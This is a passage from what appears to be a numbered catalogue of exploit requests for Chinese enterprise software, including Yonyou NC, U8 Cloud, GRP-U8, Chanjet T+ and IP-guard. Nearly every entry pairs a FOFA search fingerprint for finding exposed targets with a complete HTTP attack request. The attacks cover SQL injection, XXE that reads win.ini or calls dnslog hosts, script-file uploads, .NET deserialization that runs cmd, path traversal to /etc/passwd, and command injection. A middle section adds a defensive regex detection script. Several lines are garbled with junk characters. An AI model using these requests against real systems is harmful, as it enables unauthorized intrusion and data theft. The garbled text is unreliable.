User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
Version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. 用友U8 Cloud smartweb2.RPC.d XXE& s0 F1 E* E1 n1 b  x( R6 o  Z
FOFA:app="用友-U8-Cloud"
9 `; I  D/ t5 k/ MPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
' d* Q1 f- J; _* ]1 eHost: 192.168.40.131:8088
% [& n; k# q' ^% g- Z9 ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
" N5 A* P8 l% X6 Q2 y2 I' Q) EContent-Length: 260  N6 Y" R" O  d- ?( ?' u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
0 `9 i, ]3 w' QAccept-Encoding: gzip, deflate
* A' m2 K" O4 i9 I! eAccept-Language: zh-CN,zh;q=0.9
' Y0 A% c7 w9 i: nConnection: close
1 a0 }4 }; \# G! r4 L6 D; m. HContent-Type: application/x-www-form-urlencoded  h6 @* K9 J( k# |1 X

9 ~+ T# Y& s/ K" @1 y* k& y__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>7 d" @) R# M" k( p

( ^* E1 L2 |8 [7 G# H6 |% V0 m1 o* }/ F; v: P% l# c. P
39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

$ I5 E. e* q" y% `! M/ U& A; z48. 用友U8 CRM swfupload 任意文件上传- Y# I$ u5 s1 K, ]1 y: W$ w
FOFA:title="用友U8CRM"* |* u6 R. V: o, a6 r
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1  q/ i( t0 V8 U$ D
Host: your-ip) U7 y1 s. y* D2 M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
& l! O, |  ~9 c* ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ H0 D3 H: `' q+ l
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 w* C: C' F  ?2 s( x
Accept-Encoding: gzip, deflate& T/ m9 H& h" A& n# s3 i& c
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855" E3 _. M) M$ [* _5 S3 \3 l9 b
------269520967239406871642430066855
: L" f$ T. q9 F& f( GContent-Disposition: form-data; name="file"; filename="s.php"6 v8 U1 J3 M. R" E0 A
1231. A# m# e9 H, L$ B
Content-Type: application/octet-stream2 i% M. J* x+ G$ I6 q8 \+ S" r
------269520967239406871642430066855
/ t# w9 Y0 g2 TContent-Disposition: form-data; name="upload"
% ^# c+ p$ ~+ H7 J) `4 dupload
# S) o% R8 c, S------269520967239406871642430066855--
, j" n! |' V0 d- m% w/ ~% M0 x  }# M. T5 b( F# f5 u5 W" p! ]
+ i8 U5 l7 l7 ?( n
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空 (Yunshikong) Socialized Business ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver (泛微) E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPTech (迪普) VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it runs a command that writes the given string into the given file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet (畅捷通) T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: with the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet (畅捷通) T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet (畅捷通) T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet (畅捷通) T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

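The requests in entries 23 through 58 share a small set of textual markers that a defender can look for in access logs or a WAF: time-based SQL injection (`waitfor delay` on SQL Server, `DBMS_PIPE.RECEIVE_MESSAGE` on Oracle), error-based `extractvalue`, an external entity declared inside a `DOCTYPE`, fastjson `@type` auto-typing, the .NET `ObjectDataProvider` gadget in a JSON `__type`, `../` in a file-name parameter, and a server-side script extension in an upload file name. The Python script below is an added detection example written for this article; it is not part of the original post or of any vendor's product. It URL-decodes the request line and body once and then matches each rule, so `+` and `%27` encodings do not hide the markers. The sample requests are constructed (hosts, tokens and the `dnslog.example` name are placeholders); the paths follow the entries above so the rules can be checked against realistic input.

```python
import re
from urllib.parse import unquote_plus

# Detection rules: (label, compiled pattern). Patterns run against the
# URL-decoded request line and body, so "+" and "%27" do not hide them.
RULES = [
    ("sqli-time-mssql", re.compile(r"\bwaitfor\s+delay\s*'", re.I)),
    ("sqli-time-oracle", re.compile(r"\bdbms_pipe\.receive_message\s*\(", re.I)),
    ("sqli-error-mysql", re.compile(r"\bextractvalue\s*\(", re.I)),
    # A DOCTYPE that declares an entity or points at an external DTD.
    ("xxe", re.compile(r"<!DOCTYPE\b.*?(<!ENTITY|\bSYSTEM\b)", re.I | re.S)),
    ("fastjson-autotype", re.compile(r'"@type"\s*:\s*"', re.I)),
    ("dotnet-objectdataprovider",
     re.compile(r"System\.Windows\.Data\.ObjectDataProvider", re.I)),
    ("path-traversal", re.compile(r"\.\.[/\\]")),
    ("script-upload",
     re.compile(r'filename="[^"]*\.(?:jspx?|php|aspx?)\s*"', re.I)),
]


def scan_request(method, target, body=""):
    """Return the labels of every rule that matches the decoded request."""
    # One decoding pass. A double-encoded payload would need a second pass;
    # a production filter decodes until the text stops changing (bounded).
    decoded = unquote_plus(target) + "\n" + unquote_plus(body)
    return [label for label, rx in RULES if rx.search(decoded)]


# Constructed sample traffic (not captured from any real system). Paths and
# parameter names follow the entries above; hosts and values are placeholders.
SAMPLES = {
    "benign": ("GET",
               "/portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1001", ""),
    "sqli-mssql": ("GET",
                   "/portal/pt/yercommon/linkVoucher?pageId=login"
                   "&pkBill=1'waitfor+delay+'0:0:5'--", ""),
    "sqli-oracle": ("GET",
                    "/ebvp/infopub/showcontent?id=1'+AND+1="
                    "DBMS_PIPE.RECEIVE_MESSAGE(1,5)--", ""),
    "sqli-mysql-error": ("POST", "/course/filterRecords/",
                         "searchdata[1][searchfield]=1=1 and extractvalue("
                         "1,concat(0x5e,(select md5(123456)),0x5e))%23"),
    "xxe-form": ("POST", "/uapws/soapFormat.ajax",
                 'msg=<!DOCTYPE foo[<!ENTITY ext SYSTEM '
                 '"file:///C://windows/win.ini"> ]>'
                 '<soap:Envelope>%26ext%3b</soap:Envelope>'),
    "fastjson": ("POST", "/evo-runs/v1.0/auths/sysusers/random",
                 '{"a":{"@type":"com.alibaba.fastjson.JSONObject",'
                 '{"@type":"java.net.URL","val":"http://dnslog.example"}}""}'),
    "dotnet": ("POST",
               "/tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx"
               "?method=GetStoreWarehouseByStore",
               '{"storeID":{"__type":"System.Windows.Data.ObjectDataProvider,'
               ' PresentationFramework","MethodName":"Start"}}'),
    "traversal-plain": ("GET",
                        "/ma/emp/maEmp/download?fileName=../../../etc/passwd", ""),
    "traversal-encoded": ("GET", "/..%2F..%2F..%2Fetc%2Fpasswd", ""),
    "jsp-upload": ("POST", "/uapim/upload/grouptemplet?groupid=nc&fileType=jsp",
                   'Content-Disposition: form-data; name="upload"; '
                   'filename="probe.jsp"\r\n'),
}


def scan_samples(samples=SAMPLES):
    """Map each sample name to the list of rule labels it triggers."""
    return {name: scan_request(*req) for name, req in samples.items()}


if __name__ == "__main__":
    for name, hits in scan_samples().items():
        print(f"{name:18s} -> {hits or ['clean']}")
```

Pair a hit with the source address and the request path when triaging: almost every injection entry above is reachable without a session (`pageId=login`, `DontCheckLogin=1`), so a match on one of these paths from an unauthenticated client is the signal to act on. The FOFA fingerprints listed with each entry can be run against your own asset inventory to find which hosts expose the affected products.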
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行8 [9 ~& f+ N# e8 L9 ^( _  ~+ o
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
2 w" l" Y0 {+ ]7 [! _& QPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.16 Y# K! ^( \+ ~+ V6 `  _* W1 r
Host: 192.168.86.128:9090. T9 U+ y: U& S; X9 u8 R
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36- Q3 {9 p( W7 P4 b2 w9 y( W
Connection: close
; |0 L: B6 _0 F; L# F" P6 v5 m+ yContent-Length: 1669$ _$ P9 C- Z& q: F- f& M2 y, {
Accept: */*" K% N0 m% V9 I
Accept-Language: en
( w5 E0 H- C5 p2 H4 S; o; {Content-Type: application/x-www-form-urlencoded& u% o  D& m  c1 Y! V. F
Accept-Encoding: gzip
* i9 g2 B9 P, S1 [9 Q8 _* {
* l7 P6 h+ |+ y8 z: `; ]PAYLOAD& d0 ]" p! ^1 @0 N- o/ M

" [: u5 |* h: x0 @( O8 ^, v3 ]
60. 百卓 Smart管理平台 importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特客户资源管理系统 fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then access:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚管理信息系统 CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

